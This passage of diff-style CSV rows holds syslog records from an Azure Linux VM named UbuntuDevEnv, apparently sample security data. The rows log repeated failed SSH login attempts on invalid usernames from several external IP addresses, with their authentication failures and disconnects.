+17026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:10,UbuntuDevEnv,2019-06-26 08:26:09,auth,UbuntuDevEnv,info,Disconnected from invalid user ejabberd 143.0.52.117 port 57536 [preauth],56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ejabberd,143.0.52.1,57536,,
+17027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:10,UbuntuDevEnv,2019-06-26 08:26:09,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 57536:11: Bye Bye [preauth],56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,57536,,
+17028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:11,UbuntuDevEnv,2019-06-26 08:26:10,auth,UbuntuDevEnv,info,Invalid user bot from 45.55.190.46 port 59284,56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,45.55.190.4,59284,,
+17029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:11,UbuntuDevEnv,2019-06-26 08:26:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:11,UbuntuDevEnv,2019-06-26 08:26:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:13,UbuntuDevEnv,2019-06-26 08:26:12,auth,UbuntuDevEnv,info,Failed password for invalid user bot from 45.55.190.46 port 59284 ssh2,56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,45.55.190.4,59284,,
+17032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:13,UbuntuDevEnv,2019-06-26 08:26:12,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 59284:11: Bye Bye [preauth],56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,59284,,
+17033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:13,UbuntuDevEnv,2019-06-26 08:26:12,auth,UbuntuDevEnv,info,Disconnected from invalid user bot 45.55.190.46 port 59284 [preauth],56656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,45.55.190.4,59284,,
+17034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:07,UbuntuDevEnv,2019-06-26 08:27:07,auth,UbuntuDevEnv,info,Invalid user update from 185.103.243.78 port 57498,56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,update,185.103.243.7,57498,,
+17035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:07,UbuntuDevEnv,2019-06-26 08:27:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:07,UbuntuDevEnv,2019-06-26 08:27:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:09,UbuntuDevEnv,2019-06-26 08:27:09,auth,UbuntuDevEnv,info,Failed password for invalid user update from 185.103.243.78 port 57498 ssh2,56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,update,185.103.243.7,57498,,
+17038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:09,UbuntuDevEnv,2019-06-26 08:27:09,auth,UbuntuDevEnv,info,Disconnected from invalid user update 185.103.243.78 port 57498 [preauth],56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,update,185.103.243.7,57498,,
+17039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:09,UbuntuDevEnv,2019-06-26 08:27:09,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 57498:11: Bye Bye [preauth],56919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,57498,,
+17040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:37,UbuntuDevEnv,2019-06-26 08:27:37,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 35755 [preauth],57021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,35755,,
+17041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:52,UbuntuDevEnv,2019-06-26 08:27:51,auth,UbuntuDevEnv,info,Invalid user minecraft from 143.0.52.117 port 37848,57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,143.0.52.1,37848,,
+17042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:52,UbuntuDevEnv,2019-06-26 08:27:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:52,UbuntuDevEnv,2019-06-26 08:27:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:54,UbuntuDevEnv,2019-06-26 08:27:53,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 143.0.52.117 port 37848 ssh2,57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,143.0.52.1,37848,,
+17045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:54,UbuntuDevEnv,2019-06-26 08:27:53,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 143.0.52.117 port 37848 [preauth],57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,143.0.52.1,37848,,
+17046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:27:54,UbuntuDevEnv,2019-06-26 08:27:53,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 37848:11: Bye Bye [preauth],57082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,37848,,
+17047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:54,UbuntuDevEnv,2019-06-26 08:28:54,auth,UbuntuDevEnv,info,Invalid user rachel from 185.103.243.78 port 44866,57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,185.103.243.7,44866,,
+17048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:54,UbuntuDevEnv,2019-06-26 08:28:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:54,UbuntuDevEnv,2019-06-26 08:28:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:56,UbuntuDevEnv,2019-06-26 08:28:56,auth,UbuntuDevEnv,info,Failed password for invalid user rachel from 185.103.243.78 port 44866 ssh2,57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,185.103.243.7,44866,,
+17051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:56,UbuntuDevEnv,2019-06-26 08:28:56,auth,UbuntuDevEnv,info,Disconnected from invalid user rachel 185.103.243.78 port 44866 [preauth],57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,185.103.243.7,44866,,
+17052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:28:56,UbuntuDevEnv,2019-06-26 08:28:56,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 44866:11: Bye Bye [preauth],57295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,44866,,
+17053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:29,UbuntuDevEnv,2019-06-26 08:29:28,auth,UbuntuDevEnv,info,Invalid user prova from 183.47.14.74 port 43703,57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prova,183.47.14.7,43703,,
+17054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:29,UbuntuDevEnv,2019-06-26 08:29:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:29,UbuntuDevEnv,2019-06-26 08:29:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:31,UbuntuDevEnv,2019-06-26 08:29:30,auth,UbuntuDevEnv,info,Failed password for invalid user prova from 183.47.14.74 port 43703 ssh2,57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prova,183.47.14.7,43703,,
+17057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:31,UbuntuDevEnv,2019-06-26 08:29:30,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 43703:11: Bye Bye [preauth],57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,43703,,
+17058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:31,UbuntuDevEnv,2019-06-26 08:29:30,auth,UbuntuDevEnv,info,Disconnected from invalid user prova 183.47.14.74 port 43703 [preauth],57423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prova,183.47.14.7,43703,,
+17059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:36,UbuntuDevEnv,2019-06-26 08:29:36,auth,UbuntuDevEnv,info,Invalid user admin from 143.0.52.117 port 46390,57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,46390,,
+17060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:36,UbuntuDevEnv,2019-06-26 08:29:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:36,UbuntuDevEnv,2019-06-26 08:29:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:39,UbuntuDevEnv,2019-06-26 08:29:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 143.0.52.117 port 46390 ssh2,57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,46390,,
+17063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:39,UbuntuDevEnv,2019-06-26 08:29:38,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 46390:11: Bye Bye [preauth],57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,46390,,
+17064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:29:39,UbuntuDevEnv,2019-06-26 08:29:38,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 143.0.52.117 port 46390 [preauth],57456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,46390,,
+17065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:40,UbuntuDevEnv,2019-06-26 08:30:39,auth,UbuntuDevEnv,info,Invalid user decembre from 185.103.243.78 port 60470,57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,decembre,185.103.243.7,60470,,
+17066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:40,UbuntuDevEnv,2019-06-26 08:30:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:40,UbuntuDevEnv,2019-06-26 08:30:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:42,UbuntuDevEnv,2019-06-26 08:30:41,auth,UbuntuDevEnv,info,Failed password for invalid user decembre from 185.103.243.78 port 60470 ssh2,57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,decembre,185.103.243.7,60470,,
+17069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:42,UbuntuDevEnv,2019-06-26 08:30:41,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 60470:11: Bye Bye [preauth],57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,60470,,
+17070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:30:42,UbuntuDevEnv,2019-06-26 08:30:41,auth,UbuntuDevEnv,info,Disconnected from invalid user decembre 185.103.243.78 port 60470 [preauth],57764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,decembre,185.103.243.7,60470,,
+17071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:25,UbuntuDevEnv,2019-06-26 08:31:24,auth,UbuntuDevEnv,info,Invalid user julia from 143.0.52.117 port 54935,57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julia,143.0.52.1,54935,,
+17072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:25,UbuntuDevEnv,2019-06-26 08:31:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:25,UbuntuDevEnv,2019-06-26 08:31:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:26,UbuntuDevEnv,2019-06-26 08:31:26,auth,UbuntuDevEnv,info,Failed password for invalid user julia from 143.0.52.117 port 54935 ssh2,57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julia,143.0.52.1,54935,,
+17075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:27,UbuntuDevEnv,2019-06-26 08:31:26,auth,UbuntuDevEnv,info,Disconnected from invalid user julia 143.0.52.117 port 54935 [preauth],57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julia,143.0.52.1,54935,,
+17076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:27,UbuntuDevEnv,2019-06-26 08:31:26,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 54935:11: Bye Bye [preauth],57925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,54935,,
+17077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:31:29,UbuntuDevEnv,2019-06-26 08:31:28,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 51655 [preauth],57928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,51655,,
+17078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:22,UbuntuDevEnv,2019-06-26 08:32:21,auth,UbuntuDevEnv,info,Invalid user eg from 185.103.243.78 port 47838,58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eg,185.103.243.7,47838,,
+17079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:22,UbuntuDevEnv,2019-06-26 08:32:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:22,UbuntuDevEnv,2019-06-26 08:32:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:24,UbuntuDevEnv,2019-06-26 08:32:23,auth,UbuntuDevEnv,info,Failed password for invalid user eg from 185.103.243.78 port 47838 ssh2,58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eg,185.103.243.7,47838,,
+17082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:24,UbuntuDevEnv,2019-06-26 08:32:23,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 47838:11: Bye Bye [preauth],58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,47838,,
+17083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:32:24,UbuntuDevEnv,2019-06-26 08:32:23,auth,UbuntuDevEnv,info,Disconnected from invalid user eg 185.103.243.78 port 47838 [preauth],58129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eg,185.103.243.7,47838,,
+17084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:15,UbuntuDevEnv,2019-06-26 08:33:15,auth,UbuntuDevEnv,info,Invalid user mirror03 from 143.0.52.117 port 35243,58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mirror03,143.0.52.1,35243,,
+17085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:15,UbuntuDevEnv,2019-06-26 08:33:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
